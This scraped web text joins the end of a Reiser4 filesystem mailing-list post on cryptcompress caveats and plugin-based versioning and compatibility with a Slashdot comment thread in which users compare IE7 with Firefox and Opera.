1. Currently ciphering is unsupported (for this to work, some human
key manager is needed).
2. Don't create loopback devices over files managed by cryptcompress
plugin, as it doesn't work properly for now.
3. Make sure your boot partition does not contain files managed by
cryptcompress plugin, as grub does not support this.
C. Compatibility
WARNING: Don't try to check/repair your partition that contains
cryptcompress files with reiser4progs of version less then 1.0.6. Also
don't try to mount such partition in old kernels < 2.6.18-mm3.
We hope to completely avoid such compatibility problems (and therefore
to get rid of "don't mount to kernelXXX" and "don't check by
reiser4progsYYY" stuff) in future via using a simple technique based
on plugin architecture as it is described in the document appended
below. All comments, suggestions and, of course, bugreports are
<reiserfs-dev at namesys dot com>,
<reiserfs-list at namesys dot com>.
Hope, you'll find this stuff useful.
Reiserfs team.
Appendix D.
Devoted to resolving backward compatibility problems in Reiser4.
Directed to file system developers and anyone with an interest in
Reiser4 and plugin architecture.
Reiser4 file system: development, versions and compatibility.
Edward Shishkin
1. Backward compatibility problems
Such problems arise when user downgrades kernel or fsprogs package:
old ones can be not aware of new objects on his partition. We have
tried to resolve backward compatibility problems using plugin
architecture that reiser4 is based on. The main idea is very simple:
to reduce them to a problem of "unknown" plugins". However, this puts
some restrictions to the development model. Such approach (introduced
in 2.6.18-mm3 and reiser4progs-1.0.6) is considered below in details.
On one's way we try to clarify reiser4 possibilities in the
development aspect.
2. Core and plugins. SPL and FPL
Reiser4 kernel module consists of core code and plugins. Core includes
balancing, transaction manager, flush manager, etc. code manipulates
with virtual objects like formatted nodes, items, etc. Such
virtualization technology is not new and is used everywhere
(manipulations with VFS is a good example). Now it should be easy to
understand a concept of reiser4 plugin, the basic concept of reiser4
file system. Reiser4 plugin is a kernel data structure filled by
pointers to some functions (its "methods"). Each reiser4 plugin is
labeled by a unique pair (type, id), globally persistent plugin
identifier, so plugins with the same first components are of the same
type of data (struct typename_plugin). Plugin name is composed of id
name (first) and type name. For example: "extent item plugin" means
plugin of item type which manages extent pointers in reiser4. All
plugins of any type are initialized by the array typename_plugins.
Every reiser4 plugin has its counterpart in reiser4progs (1**).
Every reiser4 plugin belongs to one of the following two libraries
(the same for reiser4progs):
First library, SPL (per-Superblock Plugins Library), aggregates
plugins that work with low-level disk layouts (superblock, formatted
nodes, bitmap nodes, journal, etc). (Disk) format in reiser4 is a disk
format plugin (i.e plugin labeled by the pair (disk_format, id)). Disk
format are assigned per superblock. Disk format plugin installs node
plugin and some other SPL members to reiser4 superblock in mount time.
SPL has a version number defined as greatest supported disk format
plugin id.
Second library, FPL (per-File Plugins Library), aggregates so called
file managers which are to work with disk layouts (like item plugin),
represent some formatting policy (like formatting plugin), etc.
The "uppermost" plugins of file type are to service VFS entry points.
File managers are pointed by inode's plugin table (pset) described by
data structure plugin_set filled by pointers to plugins. Attributes
(type, id) of non-default file managers pointed in object's pset are
packed/extracted like other attributes to/from disk stat-data by
special stat-data item plugin. We associate FPL with a set of pairs
{(type, id) | type = file, directory, item, hash, ...}. FPL version
number is defined by another, more economic way (2**).
Every plugin has a version number defined as minimal version of
library which contains that plugin.
General version of reiser4 kernel module is defined as 4.X.Y, so that
X is version of SPL, and Y is version of FPL. We will say that X is
SPL-subversion, and Y is FPL-subversion of reiser4 kernel module. The
same for reiser4progs.
3. General disk version
Every reiser4 partition has general disk version 4.X.Y. Number X is
assigned by mkfs as some disk format plugin id (format 4.X) supported
by reiser4progs package, and can not be changed in future.
Y is assigned as FPL version of mkfs with the following upgrade at
mount time in accordance with kernel FPL version: if user mounts 4.A.B
to kernel with reiser4 module of general version 4.C.D, so that B < D,
and mount is okay, then general disk version will be updated to 4.A.D.
We will say that X is format subversion, and Y is FPL-subversion of
reiser4 partition.
4. Definition of development model
Here goes a set of rules which are not to be encoded. But first some
helper definitions.
Upgrading SPL means contributing a set of new SPL members, which
must include new disk format plugin.
Upgrading FPL means contributing a set of new FPL members and
incrementing FPL version number.
Upgrading reiser4 kernel module (reiser4progs) means upgrading SPL
and(or) upgrading FPL.
. Developer is allowed to upgrade reiser4 kernel module and
reiser4progs (3**).
. Kernel and reiser4progs should be upgraded simultaneously.
. Every such upgrade should be performed via applying a single
incremental patch.
. No "development branches", i.e. don't modify existing plugins (4**).
Issue only proved incremental patches.
As we will see below, such restrictions will help to provide
compatibility.
5. Supporting disk versions
Here we describe encoded support of the development model above. This
is what we aimed to minimize.
Suppose we want to mount a filesystem of version 4.A.B to kernel with
reiser4 module of version 4.C.D (or want to check it by reiser4progs
of such version). At first, kernel/reiser4progs will check format
subversion A. If A > C, then, obviously, format id A is unsupported by
kernel/reiser4progs, and mount/check will be refused. Suppose, format
subversion A is ok(supported). If B <= D, then in accordance with (4)
pset members packed in disk stat-data of every object are supported by
kernel/reiser4progs and there is no problems. The most interesting
case is when B > D. It means that disk can contain plugins that
kernel/reiser4progs is not aware of. Kernel and reiser4progs will
support such file system by different ways.
5.1. Kernel: fine-grained access to disk objects
First, some definitions.
If some plugin (file manager) is not listed by FPL of some kernel,
then we say that this plugin is unknown for this kernel, and file
managed by this plugin is not available in this kernel.
As it was mentioned above, all file managers are pointed by inode's
pset which is extracted from disk stat-data at ->lookup() time, and in
our approach this is the time when kernel recognizes unavailable
objects: if plugin stat-data extension contains unknown plugin type or
id, then read_inode() will return -EINVAL (or another value to
indicate that object is not available) and bad inode will be created.
Plugins missed in stat-data extension are assigned by kernel from file
system defaults, and, hence, are "known".
5.2. Reiser4progs: access "all or nothing"
Reiser4progs should be more suspicious about "unknown" plugins, as it
can be a result of metadata corruption. So if B > D, then reiser4progs
will refuse to work with such file system and user will be suggested
to upgrade reiser4progs. If reiser4progs package is uptodate (B <= D),
then unknown plugin type or id means metadata corruption that will be
handled by proper way.
6. Definition of compatibility
So, if B > D, then in spite of successful mount, in accordance with
(5.1) some disk objects can be inaccessible, and an interesting
question arises here: "what objects must be accessible in the case of
such partial access?". To answer this, we need some definitions.
. If some object of a semantic tree was created by kernel/reiser4progs
with FPL of version V, then we say that this object has version V.
Let's consider for every object Z of the semantic tree its version v(Z).
. If every object Z of the semantic tree is available in every kernel
with FPL of version >= v(Z), then we say, that the development model
is (weakly) compatible.
In contrast with (weak) compatibility, strong compatibility requires
each object to be accessible regardless of downgrade deepness. However
such concept does not have practical interest, and we won't consider
it. So we have a short answer on the question above: "development
model must be (weakly) compatible".
Note, that we define v(Z) to not depend on SPL version.
7. Plugin conversion
Plugins are allowed to modify object's plugin table (pset). This is a
case of so called plugin conversion, when management is passed to
another plugin of the same type: (type, id1) -> (type, id2). So,
plugin conversion is a type safe operation. Such dynamic (on-the fly)
conversion can be useful (5**). Examples:
. tail conversion (passing management from tail to extent item plugin
and back) performed for files managed by unix-file plugin. Came from
reiserfs (v3), although nobody suspected that this is a kind of such
plugin operation;
. file conversion (passing management from cryptcompress to unix file
plugin) performed for incompressible files.
Definition. If plugin conversion doesn't increase plugin version, then
we say it is squeezing.
8. How to provide compatibility?
Now it should be obviously, how to provide it: just upgrade reiser4
kernel module and reiser4progs in accordance with the
instructions (4).
Statement. "2-dimentional" development model defined by instructions
(4) is (weakly) compatible.
Proof. In accordance with definition of compatibility, it is enough to
consider only upgrading FPL. In accordance with the instructions (4)
every implemented plugin conversion is squeezing. Let's consider a
root node R of the semantic tree, so R consists of root directory and
all its entries. Since version of plugins pointed by root pset can not
be increased (6**), we have that every object Z of R is available in
every kernel with FPL of version >= v(Z). Do the same for every node
of the semantic tree in descending order.
9. On-disk evolution of format 4.X in compatible development model
How this theory looks in real life.
Suppose user has created (by mkfs) a file system of version 4.X.i, and
want to mount empty file system to kernel with version 4.Y.j (Y >= X).
If i < j, then kernel will upgrade disk version to 4.X.j and user will
be suggested to run fsck to update also backup blocks (7**). If i > j,
then kernel will complain that its FPL-subversion is too small, so
some files can be inaccessible. Actually even empty root directory can
be inaccessible in ancient kernels (if so, then mount will be
refused).
Suppose, mount was okay, and user was working for a long time with
this partition upgrading kernel from time to time, so FPL-subversion
numbers got upgraded to j_1, j_2, ...j_k (j < j_1 < ... < j_k). This
scenario defines on the latest FPL = FPL(j_k) a structure of nested
subsets (filtration):
FPL(j) < FPL(j_1) < FPL(j_2) < ... < FPL(j_k),
which induces filtration on the latest snapshot of user's semantic
tree:
T(j) <= T(j_1) <= T(j_2) <= ... <= T(j_k).
Here "<=" means "subtree" (i.e. T(j_1) is a subset of T(j_2), moreover
T(j_1) is a tree with the same root). T(j_s) is a snapshot of the
semantic tree that was upgraded to j_(s+1), or a part of this snapshot
(if something was removed after later upgrades). T(j_s)\T(j_(s-1))
("\" is "without") contains objects of version j_s.
In accordance with the development model above all elements of T(j_s)
are managed by plugins of versions <= j_s, and, hence, all of them
will be accessible in kernels with FPL version >= j_s.
10. Subversion numbers: why do we need this?
One can ask: "Why do we need to keep/manage FPL-subversion numbers?
Just add new per-file plugins properly, and everything will be
recognized/handled automatically". For sure, indeed. However, keeping
track of them is useful for some reasons:
. For fsck to catch metadata corruption as it was described in (5.2).
. For various accessibility issues. For example, you have offline
reiser4 partition and want to know what kernel will provide full
access (not restricted) to all objects (solution: run debugfs.reiser4,
look at disk subversion number, then have a kernel with appropriate
FPL version).
11. Examples
11.1. Transparent compression support
The following is a list of FPL members that have been added for such
support:
. cryptcompress file plugin
. ctail item plugin
. compression transform plugins (new type)
. compression mode plugins (new type)
11.2. Transparent encryption support
Not yet implemented. It is supposed to be implemented for existing
cryptcompress file plugin: one just need to add cipher transform
plugins (it should be wrappers for linux crypto-api) and provide human
key manager.
11.3. Supporting ECC-signatures for metadata protection
Not yet implemented. In order to support such signatures we need new
node format and, hence, new disk format plugin id. ECC signature
should be checked by zload() for data integrity and possible error
correction, and updated in commit time right before writing to disk.
11.4. Supporting xattrs
Not yet implemented. Here we need new stat-data extension plugin (for
packing/extracting namespaces, etc.) and a new file plugin as the most
graceful way to not allow old objects acquire new stat-data extension
(i.e. to not break compatibility).
------
(1**) Counterpart with the same (type, id) in reiser4progs can do
different work. For example, fsck doesn't perform data decompression,
but uses compression plugin (namely, its ->checksum() method) to check
data integrity.
(2**) Currently it is hardcoded, see definition of
PLUGIN_LIBRARY_VERSION in kernel (reiser4/plugin/plugin.h) and
reiser4progs (include/reiser4/plugin.h).
(3**) We don't consider modifications of core code, as it doesn't
break compatibility, at least we put efforts for this.
(4**) However, anyway, it is impossible to avoid various bugfixes and
micro-optimizations. Instructions about modifications of existing
plugins is out of this paper. For now just make sure, that they don't
break compatibility. Changing disk layouts and using non-squeezing
plugin conversion is unacceptable.
(5**) Actually, it is not easy to implement plugin conversion: most
likely that it won't be a simple update of file's plugin table (pset),
but will also require conversion of controlled objects and
serialization of critical code sections that work with shared pset.
(6**) Actually, plugin set of root directory can not be changed at
all, as it defines "default settings" for the partition.
(7**) Backup blocks are copies of main superblock spread through the
whole partition. Before updating backup blocks, fsck will check the
whole partition for consistency. It shouldn't cause discomfort, as
upgrading reiser4 is not a frequent event. Anyway, specification of
backup blocks is quite complex and it is better for kernel to not be
aware about them (they just look as busy blocks for kernel). Updating
status of backup blocks is reflected by special flag in superblock.
Mounting with not updated backup blocks is possible without any
additional options: kernel will warn for every such mount. When
rebuilding crashed filesystem with not updated backup blocks, user
will be suggested to confirm that new disk version in main superblock
is correct (not a result of metadata corruption).
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at
Please read the FAQ at | http://lkml.org/lkml/2007/3/14/446 | crawl-002 | refinedweb | 3,543 | 56.45 |
$wgGroupPermissions['*']['read'] = false; $wgGroupPermissions['*']['edit'] = false; $wgGroupPermissions['user']['read'] = false; $wgGroupPermissions['user']['edit'] = false;
MediaWiki is designed for the most part to be an open document repository. In most setups (presumably), everyone can read and only registered users can edit. However, permissions can’t get much more granular than this. For my project at least, I would like to not just limit anonymous users from editing, I would like to selectively limit them from reading certain things.
I looked around for quite some time until I came upon a variable you can set in your LocalSettings.php file: $wgWhitelistRead. Basically, this variable whitelists the pages specified in the array. The downside to this is you can’t use wildcards or namespaces/categories. You must specify a single page per array value. This doesn’t quite cut it for my needs. That being said, here’s my solution (albeit rough).
The end goal here looks like this…
All users are blocked from reading and writing all pages
Users in all groups are then given read access to the whitelisted namespaces
Finally, users in the specified groups have read and write access to all pages (save for the administration/sysop pages of course).
To do this, in your LocalSettings.php file, place the following four lines…
$wgGroupPermissions['*']['read'] = false; $wgGroupPermissions['*']['edit'] = false; $wgGroupPermissions['user']['read'] = false; $wgGroupPermissions['user']['edit'] = false;
Once you have the lines in the last section in your config file, your entire wiki should be unavailable, even to sysop people (they are users after all). To give access back to your sysop folk, place the following two lines in your LocalSettings.php file
$wgGroupPermissions['sysop']['read'] = true; $wgGroupPermissions['sysop']['edit'] = true;
This will only grant access to your sysop authenticated users. If they’re not already authenticated, they still can’t get to the Special:UserLogin form (we’ll get to that in just a few) to login. They may be sysops at heart, but hearts don’t authenticate people without usernames and passwords.
Now that our sysops have permissions, next we need a custom group so we can grant permissions to them. We’ll call that group GreenTea (yes, I’m drinking some green tea right now). To do that, let’s throw another few lines in the LocalSettings.php file…
$wgGroupPermissions['greentea'] = $wgGroupPermissions['user']; $wgGroupPermissions['greentea']['read'] = true; $wgGroupPermissions['greentea']['edit'] = true;
Now that our group is set up, we need to whitelist the necessary and wanted pages for anonymous folk to log in and/or do their thing depending on what groups they are in. To do this, let’s add yet another few lines to our LocalSettings.php file
$wgWhitelistRead = array( 'Main Page', 'Special:Userlogin', 'Special:UserLogout', );
What we just did was whitelist the main page, the login page, and the logout page. This allows users to get in and out of your wiki, whether or not their permissions allow them access to anything. At this point, you can log in with your sysop user and put people into our previously created greentea group. Once that’s done, the greentea users should have full access to the entire wiki.
I would like to note here that that this point, users outside of the greentea group will have the same permissions as anonymous/unauthenticated users. They cannot read or edit any pages other than the ones currently whitelisted.
This is the only part that’s out of the ordinary here. We are going to edit actual MediaWiki code. The big downside to doing this is that if the MediaWiki instance is upgrade, it is highly likely that the changes made in this section will be overwritten. Thankfully though, the changes are very simple, so making them again shouldn’t be a problem. They’re so simple in fact, I think the MediaWiki folks might actually accept my code into their branch.
To set up our MediaWiki instance so it handles regex whitelist statements, we need to edit the Title.php file in the includes directory.
Firstly, we need to comment out the code that processes the whitelist variable. Head to around line 1870 in Title.php and comment out just the following lines
//Check with and without underscores if ( in_array( $name, $wgWhitelistRead, true ) || in_array( $dbName, $wgWhitelistRead, true ) ) return true;
Now that those have been commented out, we need to add in the code that will process regex statements in the whitelist array. Below the lines you just commented out, add the following code…
foreach ( $wgWhitelistRead as $item ) if ( preg_match( '/^'.$item.'$/', $name ) || preg_match( '/^'.$dbName.'$/', $name ) ) return true;
To use the changes we just put in place, all that needs to be done is edit the $wgWhitelistRead variable in LocalSettings.php again.
Say, for example, that we have a HowTo namespace (HowTo:Drink Green Tea for example) that we want everyone to be able to read that isn’t in the greentea group (they have to learn somehow after all). All that needs to be done is a little regex…
$wgWhitelistRead = array( 'Main Page', 'Special:Userlogin', 'Special:UserLogout', 'HowTo:.*', );
That just whitelisted all pages inside the HowTo namespace.
In case anyone who doesn’t know is wondering why you put a .* at the end of the HowTo namespace, here you go.
In regular expressions, various symbols have different meanings. In this case, the period signifies any case letter, number, symbol, etc. That means that HowTo:. would match anything like HowTo:A, HowTo:3, HowTo:-, etc. It would however not match HowTo:A123. Why? The period in regular expressions matches only one character. What we need is to say match any character any number of times after HowTo:. For that we’ll need the asterisk.
The asterisk in regular expressions is what we call a quantifier. It doesn’t represent a character so much as a quantity. In non regex terms, an asterisk means that the previous character in the regex string can be repeated zero or more times and still match. That means that the regular expression c* would match nothing, c, cccc, cccccc, etc. It would however not match for example, b, 5, 12345a, etc. In our example, HowTo:.*, the period represents any character and it is followed by an asterisk, so that means that any article that starts with HowTo: will match, no matter what the ending, even if it doesn’t have one.
Hopefully someone finds this post useful. If anyone has questions about .* please ask them in the comments. | https://oper.io/?p=Whitelist_MediaWiki_Namespaces_with_$wgWhitelistRead | CC-MAIN-2017-26 | refinedweb | 1,075 | 63.9 |
1 /* HintTypeT: HintTypeTest.java,v 1.4 1999/08/19 15:16:59 jochen Exp $18 */19 20 21 /**22 * The primitive types can give some headaches. You almost never can say23 * if a local variable is of type int, char, short etc. <p>24 *25 * Most times this doesn't matter this much, but with int and character's26 * this can get ugly. <p>27 *28 * The solution is to give every variable a hint, which type it probably is.29 * The hint reset, when the type is not possible. For integer types we try30 * to set it to the smallest explicitly assigned type. <p>31 *32 * Some operators will propagate this hint.<p>33 */34 public class HintTypeTest {35 36 public void charLocal() {37 String s= "Hallo";38 for (byte i=0; i< s.length(); i++) {39 char c = s.charAt(i);40 if (c == 'H')41 // The widening to int doesn't occur in byte code, but42 // is necessary. This is really difficult.43 System.err.println("H is "+(int)c);44 else45 System.err.println(""+c+" is "+(int)c);46 }47 }48 }49 50 51
Java API By Example, From Geeks To Geeks. | Our Blog | Conditions of Use | About Us_ | | http://kickjava.com/src/HintTypeTest.java.htm | CC-MAIN-2016-44 | refinedweb | 204 | 76.93 |
IE7 From a Firefox User's Perspective
Buertio writes, "A week with IE takes a look at IE7 from the perspective of a long-time Firefox user. The verdict? Microsoft has come a long way but still has some way to go before taking on Firefox and Opera."
Opportunity (Score:5, Interesting)
Firefox will go through the same thing next year, since Firefox 3 won't run on Windows 98 or Me, but it'll still run on Windows 2000. Of course, that's another 8-10 months for some users to upgrade (those percentages are about a third of what they were a year ago) -- and if you've gotten them hooked on Firefox while they're on Win98, they'll probably stick with it when they move to a new machine with XP/Vista. And in a year or two, as IE7 supplants IE6 and websites start targeting it, those holdout Windows 98 users might decide they're better off with a slightly-outdated Firefox 2 than a massively-outdated IE6.
Re:Opportunity (Score:5, Insightful)
Sure, you can try and get your 98 and ME-using friends to use Firefox, but suggesting that it might be a good idea for the project as a whole to go after a small and shrinking segment of the population, particularly when that segment of the population is defined in part by not liking change, does not seem to be a winning strategy to me.
Re:Opportunity (Score:5, Funny)
So basically, you screamed at them for telling her exactly the same thing you did?
Re: (Score:3, Insightful)
Begone, androgynous blowhard.
[1]presumably to extend the grip of the fifth branch of government, Redmond
Re: (Score:2)
Trying to kickstart a little circulation above the neck, there are bootable ISOs aplenty, many of which target that old Packard Bell just fine.
Assuming tech support also stands to piss, they will know enough to tell people to run dhclient or whatever the distro uses t
Re: (Score:2, Insightful)
Is anyone else confused by this?
No, I didn't get confused. (Score:2)
Re: (Score:2)
So why did you yell at them as you clearly seem to agree with them in the end?
Re: (Score:2)
Still, it's nice to have the latest FF browser, if only because we know it gives some of the security that Windows never had.
(I'm typing this from a 500 MHz Compaq PIII that was upgraded to Xubuntu with FF2.0, including Flash 9b)
Minimo (Score:3, Informative)
Re: (Score:3, Insightful)
Minimo is far too big and too slow to be used in a mobile device. As much as I love Mozilla on the PC (using it since 1999), Opera Mobile is currently the best mobile browser.
Re: (Score:2)
Also, a growing number of users will be relying on the web for running web apps, so:
- IE6 is a PITA as a webapp client (try selecting from a longish dropdown menu by typing the first letters on the keyboard...)
- IE7 won't be available for web clients with embedded Linux, a big market in the near future IMHO
- FF2 spelling chec
Re: (Score:2, Insightful)
I doubt that many people who aren't running XP will switch to Firefox - the likelihood is that anyone in that situation who hasn't already switched won't understand and won't care.
Re: (Score:3, Insightful)
Also notice that IE7 *requires* a legal copy of Windows XP; you need to run through this WGA thing. And even if it's possible to circumvent it, it's unlikely that most of the people (who don't have a Windows license) will do it. So it's possible that a big number of XP users *will* install Firefox, just to avoid being left behind by the IE7 users and Firefox users.
Statistics From My Website are Scary. (Score:3, Informative)
Well this is pretty scary. My website [darwinawards.com] usage? Out of 150,000 cgi hits in October... rounded to one sig digit...
126,000 Windows NT
9,000 Mac OS X
2,000 Yahoo! Slurp
3,000 Windows 98 (or Win98)
2,000 Linux
600 Windows CE
400 Mac_PowerPC
200 Windows 95
200 Windows ME
70 Windows CE
40 Blackberry
and approx 162 misc entries.
I had no idea the world was so overwhelmingly Windows! Grrr.
I can do this also for the 7,000,000 monthly "regular" page hits (as opposed to cgi) but I assume I'd get about the same res
Re: (Score:2)
The majority of Windows users out there are on 95 or 98. It may be true that the majority of the ones who actively use the web are on XP, though.
Re: (Score:2)
Breaking apps? (Score:2)
Such as Oracle's Jinitiator.
how about IE7 from a links2 user? (Score:4, Funny)
Tarnished Brand (Score:5, Interesting)
All Microsoft can hope to do at this point is prevent more users from switching away, but that'll only work so long as IE7 doesn't become an exploitfest like its mildly-retarded predecessor. The next year or so will determine that as more IE6 users and malware authors migrate to IE7.
Re: (Score:2, Interesting)
No... Simply No....
You are so wrong, you don't even see it. Internet Explorer is a tarnished brand for the people that read slashdot, for the people that care about interoperability, for those that care about standards. Outside of that world, there is a world where Microsoft is a good brand name, equivalent to Jaguar in cars! Microsoft is the brand that bring you computing, that *is* computing.
I know that what the above paragraph says is not true, but it is for millions and millions of people.... I
Re: (Score:2)
-matthew
IE 7 RSS reader? (Score:5, Interesting)
Before taking on Firefox and Opera? (Score:4, Insightful)
Re: (Score:2)
Re:Before taking on Firefox and Opera? (Score:5, Insightful)
It's a completely valid and highly useful way of looking at things. It actually makes more sense to me personally than going by aggregated statistics which lump all things together. Some sites are dominated by Firefox users. Other sites are not. The sites that are dominated by Firefox represent valid and lucrative markets in and of themselves. Of course if you aggregate everything together into one big lump, then in terms of numbers, IE is "winning". But that's not a very meaningful way to look at things. For exactly the same reason GDP is a horrible way to estimate economic health of a nation, and all the sane economists know this.
IE has more market share than the iPod... (Score:2)
sure... (Score:5, Insightful)
Well, considering it has the majority market share, it looks like they need to do nothing. They've already won the battle, it's up to Firefox and Opera to take on them.
Re: (Score:2)
ie better than firefox and opera in xml/ xsl (Score:3, Informative)
and opera flat out just doesn't support xsl formatting [opera.com]
nevermind ie7, ie6 does both, just fine
in my book, as an xml/ xsl programmer, ie is light years ahead of firefox and opera
Re: (Score:2, Insightful)
Re: (Score:2)
Re: (Score:2)
In Mozilla, this happen quite a lot, in Opera less so, but it is still not interactive responsive enough for my taste (even though that's the best I know), with multiple window when one window was frozen, you could still use the other without trouble: that's a defini
It's a matter of putting priority fixes first (Score:2, Insightful)
Re:ie better than firefox and opera in xml/ xsl (Score:5, Interesting)
I can't understand this. IE doesn't even preserve the encoding type on an XSL transform. I can't use it *at all* for my Japanese documents.
And it has unbelievably poor support for CSS. It won't even do tables. Not even in IE 7...
Your comment kind of blows me away...
i agree with you (Score:2)
as xml and xsl support improves, i'd say that the way you and i are working is the foundations of web 3.0
Re: (Score:3, Informative)
Make sure your page loads in standards mode instead of quirks mode by defining an appropriate doctype. If you don't have a doctype, or have an incorrect doctype, it will behave like IE 5 for backwards compatibility reasons.
Mod parent way, way down (Score:4, Insightful)
Now let's see. IE can't handle application/xhtml+xml. Its JavaScript implementation doesn't support any of the namespaced DOM functions (createElementNS, getAttributeNS, etc.) making it pretty much useless for any sort of dynamic handling of XML that contains multiple namespaces. Hell, IE7 fails 38% of the W3C's DOM test suite.
Obviously, MoFo has omitted several rather important things from their browser product, one of them happening to be the ability to load external entities. But to say that Opera doesn't support XSLT is just blatantly wrong, and while I certainly don't advocate working around broken browser behaviour, it's certainly something that's done a lot for IE -- I bet you could do it for Firefox's flaw, too, if you spent less time complaining and more time working.
Memory Issues (Score:4, Insightful)
Re: (Score:2)
Well.... (Score:5, Insightful)
I can't speak to Opera, by Firefox 1.5 crashes on me much more than IE6 ever did (based on experience with two different machines), and my experience with IE7 is that it is solid. And some sites using fancy forms (for example, my LinkSys/Cisco home router) don't work with FF at all.
Don't get me wrong, Firefox is still my default browser (I'm using it now), but by some meterics IE is more than a match.
Re: (Score:2, Interesting)
Re:Well.... (Score:5, Informative)
Re: (Score:2)
I don't use
Re: (Score:3, Insightful)
IE7.. got it.. nothing to write home about. Cute upgrade. Still like Firefox a lot more.
Here's something to chew on. I know a whole bunch of people whose machines were seriously pwned because of IE exploits. Thats enough to turn you off a piec
Re: (Score:2) [mozillazine.org]
Re: (Score:2)
Drawback (Score:4, Insightful)
Re: (Score:2)
Re: (Score:2)
On the bright side, if they happen to be Linux or OS X user, IE won't work at all.
Re: (Score:2)
Re: (Score:3)
IE7 Text Rendering (Score:4, Interesting)
Re:IE7 Text Rendering (Score:5, Informative)
Re:IE7 Text Rendering (Score:5, Insightful)
Regardless whether or not you like cleartype or not. IE7 should obey the system settings for that setting. I have turned off cleartype in XP, the text is to blurry for my taste, so it was quite annoying that IE7 did come with cleartype turned on by default and ignoring my system wide settings. How to turn off cleartype wasn't very intuitive either. Who would know that that setting is listed below multimedia?
Re:IE7 Text Rendering (Score:5, Informative)
Minor correction, your sentence should say assimilation not innovation .
Microsoft did not invent ClearType. [grc.com]
Enjoy,
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3, Interesting)
Re: (Score:2)
Thanks for the reminder: I had forgotten to turn on ClearType on this new work laptop.
Re: (Score:3, Informative)
LiveBookmark Folders (Score:5, Interesting)
I enjoy FireFox's live bookmarks because it gives me a quick and screen friendly way of scanning stories on sites like BBC,
Microsoft's Answer: display as a normal website with prettier formatting - and advertisements.
One saving grace for IE 7's implemenation of RSS feeds - it syncs them with Outlook 2007, where I can scan them easily as if they were email messages.
My verdict? Firefox still wins this match.
Re: (Score:2)
Yeah, it really surprised me the first time I saw IE's RSS page rendering when I was testing my own Drupal-based site. I thought at first that Drupal had applied a CSS or XSL transformation to it, and wondered where that code came from.
It's kinda cool that they use the categories supplied with the items to generate a menu though. It works very well with Drupal's feeds [drupal.org] (the menu on the right).
IE dejavu all over again... (Score:2)
It has an erie deja vu feeling of when Apple put an ad out welcoming IBM to the PC market.
Re: (Score:2)
It was Apple welcoming MS with Win95... IBM was a big player in the early PC market. "IBM-Compatible" used to be the defacto term, not "PC".
**mumbles about Whippersnappers...
Re: (Score:3, Funny) [flickr.com]
In the ad they use the term personal computer which at that time was abbreviated as PC. This was before Compaq made the first IBM clone. It was run in August of 1981.
*** mumbles about absent minded oldies....
Here's the text if you're running a non-gui computer
Welcome, IBM. Seriously. Welcome to the most exciting and important marketplace since the computer revolut
By the way (Score:2)
I started downloading it.
(Mind you it is really slow and stopped at 33kb)
Re: (Score:2)
FF 2 lacks a real page zoom (Score:4, Interesting)
FireFox 2 lacks page zooming, which from a my perspective is impossible to live without on certain displays.
I'm a web developer (sometimes), and I love FireFox. As a developer I love FireFox because the Gecko team show consistent progress towards standards. From this perspective, FireFox is what the web should be. The worst thing about developing for FireFox is... writing broken code with comment hacks to support IE's nonstandard ways. But that's not FireFox's fault.
For DEMO or home theater purposes, FireFox is (on a high-res display) very very unusable.
Why?
FireFox 2 has no page Zoom. FireFox offers unchanged as a featurem plain old "Text zoom", which is not the same.
The fact that many pages don't scale to different resolutions well is not FireFox's fault.
But until all websites adopt a consistent method of page scaling, the workaround is going to be Page Zoom.
On a 42" LCD (1920x1080p), a fullscreen FireFox browser is legible from about 3 feet away (with my eyes).
If you make the text bigger, the page layout goes toast in FF. SURE, you can go in and change your video resolution to a non-native size and cause everything to get bigger, but that is not fun and it messes with other apps. The solution for now is some kind of liner scaling on the page.
On a 42" LCD (1920x1080p), a fullscreen Opera browser is legible from about 6 feet away (with my eyes), if you use Page Zoom of 180-200%. 200% really isn't needed, but there's some annoying artifacing In Opera if you resize at a factor of 1.8. 2x looks very nice!
I see IE has page zoom now, and I've done a little bit of testing. It seems no better than opera's at first glance. But it's THERE.
I'll continue rooting for FireFox privately, but it's hard to sell people on FireFox's importance... when you have to use Opera or MSIE on the big panel display.
Here's to FF 2.5 including this feature. One hopes!
Re: (Score:2)
Re: (Score:2)
I can't imagine that Logitech wrote a bit bit of code for FF support so I would guess that the support is in there. It just needs a key binding to activate.
Re: (Score:2)
Not true... this depends on how the page was coded. If the dev used relative sizes for everything (em) instead of fixed sizes (px), then the page should scale uniformly when doing text-resizing. I have implemented this quite successfully on some email newsletters to ensure consistency between varying resolutions, native font sizes, and printability.
GUI is bad (Score:3, Interesting)
They had a clean slate to work with, and could have produced something truly intuitive, and highly usable, but instead they produce something which is only half a step away from dogshit. Honestly, separating the functional buttons is just stupid. To me, it appears that absolutely no research was done for the GUI, and they only spent money on the back end, and the graphics.
Removing the file menu is retarded.
So, to me, it doesn't matter how good IE7 is behind the curtains, the curtains themselves suck so bad that I simply will not use it.
The sad thing is that I'm not the least surprised by this: a unique opportunity completely missed, and Internet usability has been set back by at least a couple of years.
Re: (Score:2)
Yes, they hid the menu bar by default. I love my screen real-estate, so I think this is great idea. And you know what? I dont need the menu bar. Not for anything I do at all often. File menu? It's almost all under the Page button in the command bar. Tools menu? Take a guess which command button that is... Basically, the menus are only there for backward compatibility; many users will stick to
"long-time Firefox user" (Score:3, Interesting)
The majority of the older mozilla userbase is on linux, think back to when mozilla was the default browser in debian, red hat, suse. only with firefox 1.0 did the development shift from this technical userbase to the hysterical evangelicals of firefox vs IE.
Why do I care about limited platform support? (Score:2, Insightful)
On the otherhand, close integration between the OS and the browser can make for a more seamless experience (and DOJ interactions). IE 7 works on 75+% of the PCs in the world and probably nearly 100% of the PCs in companies with more than 500 employees.
slow (Score:2, Interesting)
Why I like IE7 (Score:3, Interesting)
Anyone actually expecting a firefox to Like 7? (Score:3)
That reason we leave is the exact reason why we will never return to IE, even with a great interface. We know track history for the company, and even if IE7 looks like it's bug free, we'll know there's memory leaks, crashes around the corner or what ever. It doesn't even matter if they EXIST, we will believe it has these problems just because we left IE for a reason.
There might be a few people who leave Firefox for IE especially since Firefox loses a little extension support with it's new version but we're not going to suddenly be like forgetting every reason we avoid Microsoft products.
Re: (Score:2)
Non-standard UI is a non-issue (Score:3, Insightful)
The screenshots make MSIE look bizarre to me, but I am very sceptical that this will really put MS at any sort of disadvantage. To make a joke, here: they're just copying Apple again.
